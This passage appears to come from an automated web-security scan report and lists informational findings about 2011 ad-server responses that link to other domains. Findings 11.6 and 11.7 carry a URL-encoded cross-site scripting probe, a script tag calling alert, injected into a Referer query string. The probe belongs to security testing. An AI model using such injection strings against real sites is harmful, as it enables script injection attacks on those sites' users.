The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/cdg.NowPublic.Home;kw=;ptype=home;dcopt=ist;tile=1;sz=728x90;ord=9879? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html; charset=UTF-8
Content-Length: 3913
Date: Mon, 12 Sep 2011 13:03:34 GMT

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
d%3D114%26t202kw%3Dipod-txt2" onFocus="ss('go to QuiBids.com/Auctions','aw0')" onMouseDown="st('aw0')" onMouseOver="return ss('go to QuiBids.com/Auctions','aw0')" onMouseOut="cs()" onClick="ha('aw0')"><img src="http://pagead2.googlesyndication.com/pagead/imgad?id=CPPh8uLIxN-ISBDYBRhaMggWMrJ3x0qlYw" border="0" width="728" height="90" /></a>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.nowpublic.com/%26hl%3Den%26client%3Dca-pub-7479725245717969%26adU%3DQuiBids.com/Auctions%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFq3U1KxDr7hMMUA_eC6PrDtk6v5Q" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110831/r20110719/abg.js"></script>
...[SNIP]...
11.4. http://ad.doubleclick.net/adi/cdg.NowPublic.Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/cdg.NowPublic.Home

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/cdg.NowPublic.Home;kw=;ptype=home;tile=2;sz=300x250;ord=376? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html; charset=UTF-8
Content-Length: 4089
Date: Mon, 12 Sep 2011 13:03:34 GMT

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
OO-FMTG-EN-USD-000-00000-00000" onFocus="ss('go to www.fuzemeeting.com','aw0')" onMouseDown="st('aw0')" onMouseOver="return ss('go to www.fuzemeeting.com','aw0')" onMouseOut="cs()" onClick="ha('aw0')"><img src="http://pagead2.googlesyndication.com/pagead/imgad?id=CJrdwYTpkLaL_AEQrAIY-gEyCFZRIlNwD8w9" border="0" width="300" onload="(function(that){function c(b,a,d){if(b&&a)if(b.height>0){a.style.top=0;a.style.visibility='visible'}else setTimeout(function(){c(b,a,d*2)},d)}c(that,document.getElementById('abgc'),10);})(this);" /></a>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.nowpublic.com/%26hl%3Den%26client%3Dca-pub-7479725245717969%26adU%3Dwww.fuzemeeting.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHyFwjf5Hm_14JOooJV1SaFTTwEfw" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110719/abg.js"></script>
...[SNIP]...
11.5. http://ad.doubleclick.net/adi/cdg.NowPublic.Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/cdg.NowPublic.Home

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/cdg.NowPublic.Home;kw=;ptype=home;tile=2;sz=300x250;ord=2401? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html; charset=UTF-8
Content-Length: 7459
Date: Mon, 12 Sep 2011 12:48:15 GMT

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.nowpublic.com/%26hl%3Den%26client%3Dca-pub-7479725245717969%26adU%3Dwww.nytimesknownow.com%26adT%3DConterterrorism%2BCourse%26adU%3DMarketResearch.com/Venezuela_Oil%26adT%3DVenezuela%2BOil%2BIndustry%26adU%3Damericanprogress.org%26adT%3DSharia%2BLaw%2Bin%2Bthe%2BU.S.%26gl%3DUS&amp;usg=AFQjCNFZK7l-Owc3GDBhcZkplxBK8FGsbA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
11.6. http://ad.doubleclick.net/adj/mansueto.fc/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mansueto.fc/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mansueto.fc/homepage;sz=336x150,336x210;pos=bot;dcove=d;tile=6;rasegs=seg2;lan=en;c_type=homepage;chn=homepage;cms=homepage;ord=37529191382432140? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 513
Date: Mon, 12 Sep 2011 13:06:17 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/e;245030996;0-0;0;69635154;18754-336/150;43598233/43616020/1;;~aopt=0/ff/c8/ff;~fdr=244396648;0-0;0;42089989;18754-336/150;43600317/43618104/1;;~aopt=2/0/c8/0;~sscs=%3fhttp://www.fastcompany.com/tag/fast-talk?utm_campaign=PbCCM2011&utm_source=Fast Company&utm_medium=PromoUnit&utm_content=336x150"><img src="http://s0.2mdn.net/viewad/2709522/336x150-fast-talk-8.11.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
11.7. http://ad.doubleclick.net/adj/mansueto.fc/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mansueto.fc/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mansueto.fc/homepage;sz=728x90;pos=top;dcove=d;tile=2;rasegs=seg2;dcopt=ist;lan=en;c_type=homepage;chn=homepage;cms=homepage;ord=37529191382432140? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1163
Date: Mon, 12 Sep 2011 13:06:08 GMT

document.write('<iframe src=\"http://view.atdmt.com/CNT/iview/334302974/direct/01/4245069?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3
...[SNIP]...
3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/CNT/go/334302974/direct/01/4245069" target="_blank"><img src="http://view.atdmt.com/CNT/view/334302974/direct/01/4245069"/></a>
...[SNIP]...
11.8. http://ad.doubleclick.net/adj/mansueto.fc/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mansueto.fc/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mansueto.fc/homepage;sz=728x90;pos=top;dcove=d;tile=2;;dcopt=ist;lan=en;c_type=homepage;chn=homepage;cms=homepage;ord=3257186268456280? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1163
Date: Mon, 12 Sep 2011 12:47:56 GMT

document.write('<iframe src=\"http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3
...[SNIP]...
3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/CNT/go/334302974/direct/01/1829737" target="_blank"><img src="http://view.atdmt.com/CNT/view/334302974/direct/01/1829737"/></a>
...[SNIP]...
11.9. http://ad.doubleclick.net/adj/mansueto.fc/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mansueto.fc/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mansueto.fc/homepage;sz=336x280,300x250,300x600;pos=top;dcove=d;tile=4;;lan=en;c_type=homepage;chn=homepage;cms=homepage;ord=3257186268456280? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 331
Date: Mon, 12 Sep 2011 12:47:59 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/b;225907858;0-0;0;42089989;4307-300/250;43506154/43523941/1;;~aopt=2/0/c8/0;~sscs=%3fhttps://magazine.fastcompany.com/loc/FST/300"><img src="http://s0.2mdn.net/viewad/2284073/1-fst-progressive-300x250.gif" border=0 alt="click here"></a>
...[SNIP]...
11.10. http://ad.doubleclick.net/adj/mansueto.fc/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mansueto.fc/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mansueto.fc/homepage;sz=336x150,336x210;pos=bot_two;dcove=d;tile=7;;lan=en;c_type=homepage;chn=homepage;cms=homepage;ord=3257186268456280? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 334
Date: Mon, 12 Sep 2011 12:48:06 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/v;226198159;0-0;0;42089989;18754-336/150;42312632/42330419/1;;~aopt=2/0/c8/0;~sscs=%3fhttp://www.fastcompany.com/editorial-spotlight"><img src="http://s0.2mdn.net/viewad/1256564/336x150-editspotlight-rev.gif" border=0 alt="click here"></a>
...[SNIP]...
11.11. http://ad.doubleclick.net/adj/mansueto.fc/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mansueto.fc/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mansueto.fc/homepage;sz=1x1;pos=top;dcove=d;tile=1;;lan=en;c_type=homepage;chn=homepage;cms=homepage;ord=3257186268456280? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 256
Date: Mon, 12 Sep 2011 12:47:55 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/e;44306;0-0;0;42089989;31-1/1;0/0/0;;~aopt=2/0/c8/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
11.12. http://ad.doubleclick.net/adj/n6747.popsci/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/n6747.popsci/home

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/n6747.popsci/home;pos=frame1;sz=121x45,300x100;tile=9;ord=1688890654? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 324
Date: Mon, 12 Sep 2011 12:48:30 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/z;245075708;0-0;1;62626846;3823-300/100;43615919/43633706/1;;~sscs=%3fhttp://www.youtube.com/apmodelshoot"><img src="http://s0.2mdn.net/viewad/3092574/MS_300x100-Banner_YT_Aug11.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
11.13. http://ad.doubleclick.net/adj/n6747.popsci/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/n6747.popsci/home

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/n6747.popsci/home;pos=top1;sz=200x90;tile=2;ord=1688890654? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 325
Date: Mon, 12 Sep 2011 12:48:19 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/t;244515143;0-0;1;62626846;969-200/90;43615620/43633407/1;;~sscs=%3fhttp://www.popsci.com/digital-bannerads"><img src="http://s0.2mdn.net/viewad/3301884/1-pop_ipad_200x90_08.2011.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
11.14. http://ad.doubleclick.net/adj/n6747.popsci/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/n6747.popsci/home

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/n6747.popsci/home;pos=bottom;sz=728x90;tile=13;ord=1688890654? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 331
Date: Mon, 12 Sep 2011 12:48:40 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/v;239752611;3-0;1;62626846;3454-728/90;41610042/41627829/1;;~sscs=%3fhttp://www.replayphotos.com/popularsciencephotostore/"><img src="http://s0.2mdn.net/viewad/3092574/rp_PopSci_728x90.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
11.15. http://ad.doubleclick.net/adj/n6747.popsci/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/n6747.popsci/home

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/n6747.popsci/home;pos=x89;sz=94x90;tile=3;ord=1688890654? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 244
Date: Mon, 12 Sep 2011 12:48:20 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/z;44306;0-0;0;62626846;41575-94/90;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
11.16. http://ad.doubleclick.net/adj/n6747.popsci/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/n6747.popsci/home

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/n6747.popsci/home;pos=right1;sz=300x250,300x600;tile=8;ord=1688890654? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 331
Date: Mon, 12 Sep 2011 12:48:29 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/k;239752787;0-0;1;62626846;4307-300/250;43697023/43714810/1;;~sscs=%3fhttp://www.americanphotomag.com/modelshoot"><img src="http://s0.2mdn.net/viewad/3092574/1-ModelShoot_300x250_aug11.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
11.17. http://ad.doubleclick.net/adj/n6747.popsci/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/n6747.popsci/home

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/n6747.popsci/home;pos=right2;sz=300x250,300x600;tile=11;ord=1688890654? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 328
Date: Mon, 12 Sep 2011 12:48:37 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/r;239752954;2-0;1;62626846;4307-300/250;43004939/43022726/1;;~sscs=%3fhttp://www.mentorseries.com/treks/2011/hawaii-2011"><img src="http://s0.2mdn.net/viewad/3092574/Hawaii-7-1-2011.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
11.18. http://ad.doubleclick.net/adj/uk.mtv/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/uk.mtv/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/uk.mtv/homepage;sec0=_hp;sec1=none;secN=none;search_kw=null;match_kw=null;overlay=1;layer=0;sky=1;mpu=1;region=other;sky_res=1;log=0;demo=none;event=none;search_kw=none;vid=none;vid_type=none;region=none;url=/;sz=970x66;tile=2;dcove=d;ord=485257493844255800? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 247
Date: Mon, 12 Sep 2011 12:48:50 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/f;44306;0-0;0;33841120;31670-970/66;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
11.19. http://ad.doubleclick.net/adj/uk.mtv/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/uk.mtv/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/uk.mtv/homepage;sec0=_hp;sec1=none;secN=none;search_kw=null;match_kw=null;overlay=1;layer=0;sky=1;mpu=1;adtype=overlay;region=other;sky_res=1;as_connect=none;log=0;demo=none;event=none;search_kw=none;vid=none;vid_type=none;region=none;dcove=d;url=/;sz=1x1;tile=4;dcopt=ist;ord=485257493844255800? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 289
Date: Mon, 12 Sep 2011 12:48:56 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/r;212419339;0-0;1;33841120;31-1/1;30462814/30480691/1;;~sscs=%3fhttp://www.mtv.co.uk"><img src="http://s0.2mdn.net/viewad/1654860/overlaydef.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
11.20. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy%2EdJAYBFUAbL90kBgEVQAAAeoulitI%2EZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE%2DS2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enowpublic%2Ecom%252F%2CB%253D10%2526Z%253D0x0%2526%5Fsalt%253D1964679122%2526anmember%253D541%2526anprice%253D%2526r%253D1%2526s%253D1620509%2526y%253D29%2C7d9e50b4%2Ddd3d%2D11e0%2D90ef%2D78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
